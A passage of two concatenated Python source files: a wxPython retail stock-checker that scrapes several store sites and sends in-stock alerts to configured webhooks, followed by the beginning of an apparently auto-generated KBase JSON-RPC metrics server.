self.menuHelp = wx.Menu()
self.m_menubar1.Append( self.menuHelp, u"Help" )
self.SetMenuBar( self.m_menubar1 )
self.Centre( wx.BOTH )
# Connect Events
self.whBtn.Bind( wx.EVT_BUTTON, self.OnManageWebhooks )
self.addBtn.Bind( wx.EVT_BUTTON, self.AddURLs )
self.editBtn.Bind( wx.EVT_BUTTON, self.OnChangeWebhook )
self.delBtn.Bind( wx.EVT_BUTTON, self.DeleteURL )
self.strtAllBtn.Bind( wx.EVT_BUTTON, self.OnRunAll )
self.app2Btn.Bind( wx.EVT_BUTTON, self.StopAll )
self.Bind( wx.EVT_MENU, self.OnClose, id = self.exitItem.GetId() )
def __del__( self ):
pass
def CheckURLs(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.IsChecked(i):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
else:
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def RunAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
def StopAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def AddURLs(self, event):
urldict = return_data("./data/products.json")
product_url = wx.GetTextFromUser('Enter a Product URL', 'Insert dialog')
product_webhook = "None"
num = ex.list.GetItemCount()
idx = (num + 1)
if product_url != '':
index = ex.list.InsertItem(idx, product_url)
ex.list.SetItem(index, 1, "None")
ex.list.SetItem(index, 2, "Inactive")
idx += 1
set_data("./data/products.json", product_url, product_webhook)
urldict = return_data("./data/products.json")
def DeleteURL(self, event):
urldict = return_data("./data/products.json")
selected = ex.list.GetFocusedItem()
text = ex.list.GetItemText(selected, col=0)
if selected != -1:
ex.list.DeleteItem(selected)
del urldict[text]
with open("./data/products.json", "w") as file:
json.dump(urldict, file)
file.close()
urldict = return_data("./data/products.json")
def OnChangeWebhook(self, e):
webhook_dict = return_data("./data/webhooks.json")
selected = ex.list.GetFocusedItem()
if selected != -1:
whDialog = WebhookDialog(None)
whDialog.ShowModal()
whDialog.Destroy()
def OnManageWebhooks(self, e):
webhook_dict = return_data("./data/webhooks.json")
global webhookListChoices
webhookListChoices = []
for k in webhook_dict:
webhookListChoices.append(k)
whManager = WebhookManager(None)
whManager.Show()
def OnClose(self, e):
self.Destroy()
def OnSelectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i)
def OnDeselectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i, False)
def OnApply(self, event):
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.CheckURLs, args=(self,))
t.start()
def OnRunAll(self, event):
for url in urldict:
stockdict.update({url: 'False'})
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.RunAll, args=(self,))
t.start()
###########################################################################
## Custom init
###########################################################################
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def set_data(path, val1, val2):
data = return_data(path)
data.update({val1: val2})
write_data(path, data)
class Amazon:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, options=options)
driver.get(url)
html = driver.page_source
if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in html:
print("Amazon's Bot Protection is preventing this call.")
ex.log.AppendText("Amazon's Bot Protection prevented a refresh." + '\n')
else:
status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
title_text = title_raw.text
title = title_text
img_raw = driver.find_element_by_xpath("//div[@id='olpProductImage']//img")
img = img_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
slack_data = {
'username': "Amazon Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/amazon.png",
'content': "Amazon Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock on Amazon",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
ex.log.AppendText("[" + current_time + "] " + title + " in stock at Amazon - " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class BH:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
#tree = html.fromstring(page.content)
#imgs = tree.xpath("//a[contains(@class,'wrapper')]")
#img_raw = {imgs[0].attrib}
#img = img_raw.__getattribute__(href)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to Cart" in page.text:
print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
slack_data = {
'username': "BH Photo Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bhphoto.png",
'content': "BH Photo Stock Alert: " + url,
'embeds': [{
'title': url,
'description': url + " in stock at BH Photo",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': "https://wiki.tripwireinteractive.com/images/4/47/Placeholder.png"
}
}]
}
ex.log.AppendText("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url + '\n')
stockdict.update({url: 'False'})
class BestBuy:
def __init__(self, sku, orig_url, hook):
self.sku = sku
self.hook = hook
webhook_url = webhook_dict[hook]
url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
headers2 = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers2)
link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
al = page.text
search_string = '"skuId":"' + sku + '","buttonState":"'
stock_status = al[al.find(search_string) + 33 : al.find('","displayText"')]
product_name = sku_dict.get(sku)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if stock_status == "SOLD_OUT":
print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name + '\n')
stockdict.update({sku: 'False'})
elif stock_status == "CHECK_STORES":
print(product_name + " sold out @ BestBuy (check stores status)")
stockdict.update({sku: 'False'})
else:
if stock_status == "ADD_TO_CART":
print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link + '\n')
#slack_data = {'content': "[" + current_time + "] " + product_name + " In Stock @ BestBuy " + link}
slack_data = {
'username': "BestBuy Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
'content': "BestBuy Stock Alert:",
'embeds': [{
'title': product_name,
'description': product_name + " in stock at BestBuy",
'url': link,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': bbimgdict.get(sku)
}
}]
}
if stockdict.get(orig_url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({orig_url: 'True'})
#print(stockdict)
class Gamestop:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)
driver.get(url)
html = driver.page_source
status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
title_text = title_raw.text
title = title_text
image_raw = driver.find_element_by_xpath("//img[@class='mainImg ae-img']")
img = image_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "ADD TO CART" in status_text:
print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url + '\n')
slack_data = {
'username': "GameStop Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/gamestop.png",
'content': "GameStop Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at GameStop",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class Target:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
al = page.text
tree = html.fromstring(page.content)
imgs = tree.xpath("//img[1]")
img_raw = str(imgs[0].attrib)
img = img_raw[20:-2]
title = al[al.find('"twitter":{"title":') + 20 : al.find('","card')]
#print(title)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
status = al[al.find('"availability_status":"') + 23 : al.find('","multichannel_options"')]
if status == "OUT_OF_STOCK":
print("[" + current_time + "] " + "Sold Out: (Target.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Target.com) " + title + '\n')
stockdict.update({url: 'False'})
elif status == "IN_STOCK":
print("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url + '\n')
slack_data = {
'username': "Target Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
'content': "Target Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Target",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
#print(stockdict)
else:
print("[" + current_time + "] " + "UNKNOWN STATUS: (Target.com) " + title + " for status of: " + status)
class Walmart:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
tree = html.fromstring(page.content)
title_raw = tree.xpath("//h1[starts-with(@class, 'prod-ProductTitle')]")
title = title_raw[0].text
price_raw = tree.xpath("//span[starts-with(@class, 'price display-inline-block')]//span")
price = price_raw[0].text
img_raw = tree.xpath("//meta[@property='og:image']/@content")
img = img_raw[0]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to cart" in page.text:
print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url + '\n')
slack_data = {
'username': "Walmart Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
'content': "Walmart Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Walmart for $" + price,
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Price:",
"value": "$" + price
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
if maxprice != 0:
if int(price) > maxprice:
print("in stock but not MSRP")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title + '\n')
stockdict.update({url: 'False'})
def write_log(string):
try:
ex.log.AppendText((string + '\n'))
except:
print("Failed to output to log - Message: \n " + string)
def amzfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Amazon(url, hook)
except:
print("Some error ocurred parsing Amazon")
write_log("An error ocurred parsing Amazon")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bestbuyfunc(sku, orig_url, hook, i):
print("Thread started -> " + sku)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
BestBuy(sku, orig_url, hook)
except:
print("Some error ocurred parsing BestBuy")
write_log("An error ocurred parsing BestBuy")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def gamestopfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Gamestop(url, hook)
except:
print("Some error ocurred parsing Gamestop")
write_log("An error ocurred parsing Gamestop")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def targetfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Target(url, hook)
except:
print("Some error ocurred parsing Target")
write_log("An error ocurred parsing Target")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def walmartfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
Walmart(url, hook)
except:
print("Some error ocurred parsing WalMart")
write_log("An error ocurred parsing Walmart")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bhfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
BH(url, hook)
except:
print("Some error ocurred parsing BH Photo")
write_log("An error ocurred parsing BH Photo")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def RunJob(url, hook, i):
#Amazon URL Detection
if "amazon.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if "offer-listing" in url:
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Amazon URL detected using Webhook destination " + hook)
write_log(("Amazon URL detected -> " + hook))
t = Thread(target=amzfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
else:
print("Invalid Amazon link detected. Please use the Offer Listing page.")
except:
print("Error processing URL: " + url)
#Target URL Detection
elif "gamestop.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Gamestop URL detected using Webhook destination " + hook)
write_log(("GameStop URL detected -> " + hook))
t = Thread(target=gamestopfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#BestBuy URL Detection
elif "bestbuy.com" in url:
try:
print("BestBuy URL detected using Webhook destination " + hook)
#ex.log.AppendText("BestBuy URL detected using Webhook destination " + hook + '\n')
parsed = urlparse.urlparse(url)
sku = parse_qs(parsed.query)['skuId']
sku = sku[0]
bestbuylist.append(sku)
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers)
al = page.text
tree = html.fromstring(page.content)
img = tree.xpath('//img[@class="primary-image"]/@src')[0]
title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
sku_dict.update({sku: title})
bbdict.update({sku: hook})
bbimgdict.update({sku: img})
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BestBuy URL detected using Webhook destination " + hook)
write_log(("BestBuy URL detected -> " + hook))
orig_url = url
t = Thread(target=bestbuyfunc, args=(sku, orig_url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Target URL Detection
elif "target.com" in url:
try:
#targetlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Target URL detected using Webhook destination " + hook)
write_log(("Target URL detected -> " + hook))
t = Thread(target=targetfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Walmart URL Detection
elif "walmart.com" in url:
try:
#walmartlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Walmart URL detected using Webhook destination " + hook)
write_log(("Walmart URL detected -> " + hook))
t = Thread(target=walmartfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#B&H Photo URL Detection
elif "bhphotovideo.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BH Photo URL detected using Webhook destination " + hook)
write_log(("BH Photo URL detected -> " + hook))
t = Thread(target=bhfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
def main():
app = wx.App()
global ex
ex = GUI(None)
global stockdict
stockdict = {}
products = []
global bestbuylist
bestbuylist = []
global bbdict
bbdict = {}
global bbimgdict
bbimgdict = {}
global sku_dict
sku_dict = {}
global webhook_dict
webhook_dict = return_data("./data/webhooks.json")
global urldict
urldict = return_data("./data/products.json")
#set all URLs to be "out of stock" to begin
for url in urldict:
stockdict.update({url: 'False'})
for prod in urldict:
products.append((prod, urldict[prod], "Inactive"))
ex.list.InsertColumn(0, 'URL', width=540)
ex.list.InsertColumn(1, 'Webhook')
ex.list.SetColumnWidth(col=1, width=100)
ex.list.InsertColumn(2, 'Status')
idx = 0
for i in products:
index = ex.list.InsertItem(idx, i[0])
ex.list.SetItem(index, 1, i[1])
ex.list.SetItem(index, 2, i[2])
idx += 1
ex.Show()
app.MainLoop()
if __name__ == '__main__':
main() |
kb_MetricsServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_Metrics.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_Metrics'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_Metrics.kb_MetricsImpl import kb_Metrics # noqa @IgnorePep8
impl_kb_Metrics = kb_Metrics(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_Metrics'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_Metrics.get_app_metrics,
name='kb_Metrics.get_app_metrics',
types=[dict])
self.method_authentication['kb_Metrics.get_app_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_jobs,
name='kb_Metrics.get_jobs',
types=[dict])
self.method_authentication['kb_Metrics.get_jobs'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.query_jobs,
name='kb_Metrics.query_jobs',
types=[dict])
self.method_authentication['kb_Metrics.query_jobs'] = 'required' # noqa
